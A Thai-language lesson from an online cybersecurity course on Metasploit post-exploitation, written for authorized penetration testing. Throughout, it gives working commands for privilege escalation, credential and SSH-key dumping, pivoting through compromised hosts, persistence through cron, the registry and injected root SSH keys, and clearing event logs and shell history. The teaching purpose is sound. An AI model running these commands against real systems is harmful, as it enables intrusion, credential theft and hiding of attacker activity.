0Pricing
Cyber Security Academy · บทเรียน

หลังการเจาะระบบ: เปลี่ยนเส้นทางและคงอยู่

ใช้โมดูลหลังการเจาะระบบของ Metasploit เพื่อยกระดับสิทธิ์ ดึงข้อมูลประจำตัว และสร้างการคงอยู่

หลังการเจาะระบบ: เปลี่ยนเส้นทางและคงอยู่ เป็นบทเรียน Cyber Security Academy ฟรีบน CoddyKit นี่คือบทเรียนที่ 4 จากทั้งหมด 4 บทเรียน คุณสามารถอ่านบทเรียนทั้งหมดด้านล่างฟรี — จากนั้นลองปฏิบัติด้วยตัวคุณเองในเบราว์เซอร์พร้อมตัวแก้ไขโค้ดในตัวและติวเตอร์ AI ตลอด 24/7 บทเรียนนี้เป็นส่วนหนึ่งของเส้นทางการเรียน Cyber Security Academy และความก้าวหน้าของคุณจะซิงค์ข้ามเว็บและแอป CoddyKit คอร์ส Cyber Security Academy มีบทเรียนทั้งหมด 4 บทเรียน

เป้าหมายหลังการใช้ประโยชน์จากช่องโหว่

หลังจากเข้าถึงระบบในระยะแรก เป้าหมายของผู้โจมตีคือ ยกระดับสิทธิ์ รวบรวมข่าวกรอง รักษาการเข้าถึงอย่างต่อเนื่อง และเคลื่อนที่ไปยังระบบอื่นเพื่อเข้าถึงเป้าหมายที่แท้จริง (ข้อมูล ระบบ การควบคุมโดเมน)

การตระหนักรู้ตามสถานการณ์

ขั้นตอนแรกหลังได้เชลล์คือทำความเข้าใจว่าคุณอยู่ที่ใด รวบรวมข้อมูลระบบ การกำหนดค่าเครือข่าย สิทธิ์ของผู้ใช้ปัจจุบัน กระบวนการที่กำลังทำงาน และตัวแปรสภาพแวดล้อม

meterpreter > sysinfo
meterpreter > getuid
meterpreter > getpid
meterpreter > run post/multi/recon/local_exploit_suggester
meterpreter > run post/linux/gather/enum_system

การยกระดับสิทธิ์

การยกระดับสิทธิ์ภายในเครื่องคือการเปลี่ยนจากเชลล์ที่มีสิทธิ์ต่ำไปเป็น root/SYSTEM local_exploit_suggester ของ Metasploit จะระบุโค้ดโจมตีช่องโหว่ระดับเคอร์เนลหรือภายในเครื่องที่ใช้ได้ โดยอ้างอิงจากรุ่น OS ของเป้าหมาย

meterpreter > run post/multi/recon/local_exploit_suggester

# Identifies applicable exploits
# Then:
msf6 > use exploit/linux/local/cve_2021_4034_pwnkit
msf6 > set SESSION 1
msf6 > run

การเก็บเกี่ยวข้อมูลรับรอง

รวบรวมข้อมูลรับรอง ได้แก่ รหัสผ่านที่ผ่านการแฮช ข้อมูลรับรองแบบข้อความธรรมดาในไฟล์การกำหนดค่า รหัสผ่านที่บันทึกไว้ในเบราว์เซอร์ และคีย์ SSH สิ่งเหล่านี้ช่วยให้เคลื่อนที่ไปยังระบบอื่นและรักษาการเข้าถึงได้

meterpreter > run post/linux/gather/hashdump
meterpreter > run post/windows/gather/credentials/credential_collector
meterpreter > run post/multi/gather/ssh_creds

# Check env vars for cleartext creds:
meterpreter > run post/multi/gather/env

การใช้เครื่องเป็นทางผ่าน: การส่งต่อพอร์ต

การใช้เครื่องเป็นทางผ่านคือการใช้โฮสต์ที่ถูกเจาะเป็นสะพานเพื่อเข้าถึงเครือข่ายภายในที่แยกออกมา portfwd ของ Metasploit จะสร้างการส่งต่อพอร์ตภายในเครื่องผ่านเซสชัน Meterpreter

# Forward local port 3306 to internal DB
meterpreter > portfwd add -l 3306 -p 3306 -r 10.10.10.20

# Now connect locally:
mysql -h 127.0.0.1 -P 3306 -u root

การกำหนดเส้นทางผ่านเซสชัน

โมดูล route ของ Metasploit จะเพิ่มเส้นทางเครือข่ายผ่านเซสชัน ทำให้โมดูลอื่นเข้าถึงเครือข่ายที่เข้าถึงได้เฉพาะผ่านโฮสต์ทางผ่าน

msf6 > route add 10.10.10.0/24 1   # route via session 1
msf6 > route print

# Now run modules targeting 10.10.10.x
# through session 1 as pivot

การใช้พร็อกซี SOCKS เป็นทางผ่าน

พร็อกซี Socks ผ่าน Metasploit (หรือ chisel/ssh -D) ช่วยให้คุณกำหนดเส้นทางเครื่องมือใด ๆ ผ่านโฮสต์ทางผ่านโดยใช้ proxychains ทำให้ nmap, curl และเบราว์เซอร์เข้าถึงเครือข่ายภายในได้

# Set up SOCKS proxy through session
msf6 > use auxiliary/server/socks_proxy
msf6 > set SRVPORT 1080
msf6 > set VERSION 5
msf6 > run -j

# Route tools through proxy
proxychains nmap -sT 10.10.10.0/24

กลไกการรักษาการเข้าถึง

การรักษาการเข้าถึงช่วยให้ยังเข้าถึงระบบได้หลังการรีบูตและการสูญเสียเซสชัน วิธีทั่วไป ได้แก่ งาน cron (Linux), คีย์ run ในรีจิสทรี (Windows), การแทรก SSH authorized_keys และการติดตั้งบริการ

# Linux: cron-based persistence
meterpreter > run post/linux/manage/cron_persistence

# Windows: registry
meterpreter > run post/windows/manage/persistence_exe

# SSH key injection
echo "ssh-rsa AAAA..." >> /root/.ssh/authorized_keys

การลบร่องรอย

ผู้โจมตีล้างบันทึกเพื่อรักษาความลับ หมายเหตุด้านความปลอดภัย: โซลูชัน SIEM และ EDR สมัยใหม่จะส่งบันทึกออกจากโฮสต์แบบเรียลไทม์ การล้างบันทึกภายในเครื่องจึงไม่ได้ลบระเบียนที่เก็บไว้ส่วนกลาง

meterpreter > clearev          # clear Windows event logs

# Linux: clear bash history
unset HISTFILE
cat /dev/null > ~/.bash_history

โมดูลหลังการใช้ประโยชน์จากช่องโหว่

Metasploit มีโมดูลหลังการใช้ประโยชน์จากช่องโหว่หลายร้อยรายการสำหรับ Windows และ Linux ได้แก่ การรวบรวมข้อมูลรับรอง ข้อมูลเบราว์เซอร์ การบันทึกการกดแป้นพิมพ์ การจับภาพหน้าจอ และการแจกแจงข้อมูลเครือข่าย

msf6 > use post/windows/gather/enum_logged_on_users
msf6 > use post/multi/gather/browser_history
msf6 > use post/windows/gather/screen_spy
msf6 > set SESSION 1
msf6 > run

การรู้ว่าเมื่อใดควรหยุด

ในการทดสอบการเจาะระบบที่ได้รับอนุญาต ให้หยุดเมื่อบรรลุเป้าหมายตามขอบเขตที่ตกลงกันไว้ หรือพบข้อมูลที่คุณไม่ได้รับอนุญาตให้เข้าถึง จัดทำเอกสารเส้นทางที่ดำเนินการอย่างรอบคอบ — นี่คือห่วงโซ่การโจมตีที่คุณจะรายงาน

ตรวจสอบอย่างรวดเร็ว

คำสั่ง "route add" ของ Metasploit ช่วยให้ทำสิ่งใดได้

สรุป: การทำงานหลังการใช้ประโยชน์จากช่องโหว่

การทำงานหลังการใช้ประโยชน์จากช่องโหว่ต่อยอดจากการเข้าถึงระบบในระยะแรกเพื่อสร้างผลกระทบที่แท้จริง ได้แก่ การยกระดับสิทธิ์ การเก็บเกี่ยวข้อมูลรับรอง การเคลื่อนที่ไปยังระบบอื่น และการรักษาการเข้าถึง Metasploit มีโมดูลหลังการใช้ประโยชน์จากช่องโหว่สำหรับแต่ละระยะ จัดทำเอกสารทุกขั้นตอน — ห่วงโซ่การโจมตีตั้งแต่ทางเข้าไปจนถึงเป้าหมายคือผลงานส่งมอบหลักของการทดสอบการเจาะระบบ

คำถามที่พบบ่อย

บทเรียน “หลังการเจาะระบบ: เปลี่ยนเส้นทางและคงอยู่” ฟรีหรือไม่

ใช่ — ข้อความเต็มของ “หลังการเจาะระบบ: เปลี่ยนเส้นทางและคงอยู่” ฟรีให้อ่านที่นี่บนเว็บ เพื่อปฏิบัติแบบโต้ตอบ (ตัวแก้ไขโค้ดในตัวและติวเตอร์ AI ตลอด 24/7) และปลดล็อคส่วนที่เหลือของคอร์ส Cyber Security Academy ให้อัปเกรดเป็น CoddyKit PRO คอร์ส Cyber Security Academy มีบทเรียนทั้งหมด 4 บทเรียน

คุณจะเรียนรู้อะไรในบทเรียน “หลังการเจาะระบบ: เปลี่ยนเส้นทางและคงอยู่”

ใช้โมดูลหลังการเจาะระบบของ Metasploit เพื่อยกระดับสิทธิ์ ดึงข้อมูลประจำตัว และสร้างการคงอยู่ คุณปฏิบัติ Cyber Security Academy ด้วยโค้ดที่ใช้งานได้จริงที่คุณเรียกใช้โดยตรงในเบราว์เซอร์ และติวเตอร์ AI ตลอด 24/7 ตอบคำถามของคุณขณะที่คุณไปผ่านบทเรียน

คุณต้องมีประสบการณ์ก่อนที่จะเริ่มเรียน Cyber Security Academy หรือไม่

ไม่จำเป็นต้องมีประสบการณ์มาก่อน Cyber Security Academy บน CoddyKit ออกแบบมาสำหรับผู้เริ่มต้นไปจนถึงผู้เรียนขั้นสูง คุณสามารถเริ่มต้นที่นี่หรือเริ่มจากตัวแรกและเรียนด้วยความเร็วของคุณเอง นี่คือบทเรียนที่ 4 จากทั้งหมด 4 บทเรียน

บทเรียน “หลังการเจาะระบบ: เปลี่ยนเส้นทางและคงอยู่” ใช้เวลานานแค่ไหน

บทเรียน CoddyKit ส่วนใหญ่ใช้เวลาประมาณ 5–10 นาที แต่ละบทเรียนจึงสั้นและเป็นแบบโต้ตอบ คุณสามารถก้าวหน้าอย่างต่อเนื่องและกลับมาเรียนต่อจากตรงที่เพิ่งหยุดบนเว็บและแอปได้เลย

ฉันเขียนและรันโค้ดในบทเรียน Cyber Security Academy นี้ได้ไหม

ได้ บทเรียน Cyber Security Academy ทุกบทมีตัวแก้ไขโค้ดในตัว คุณจึงเขียนและรันโค้ดจริงได้เลยในเบราว์เซอร์ และได้รับข้อเสนอแนะจาก AI ในทันที — ไม่ต้องติดตั้งในเครื่องของคุณ

บทเรียนทั้งหมดในหลักสูตรนี้

  1. สถาปัตยกรรม Metasploit และ msfconsole
  2. การใช้ประโยชน์จากช่องโหว่ที่ทราบแล้ว
  3. เพย์โหลด: แบบแบ่งขั้นกับแบบไม่แบ่งขั้น และ Meterpreter
  4. หลังการเจาะระบบ: เปลี่ยนเส้นทางและคงอยู่
← กลับไปที่ Cyber Security Academy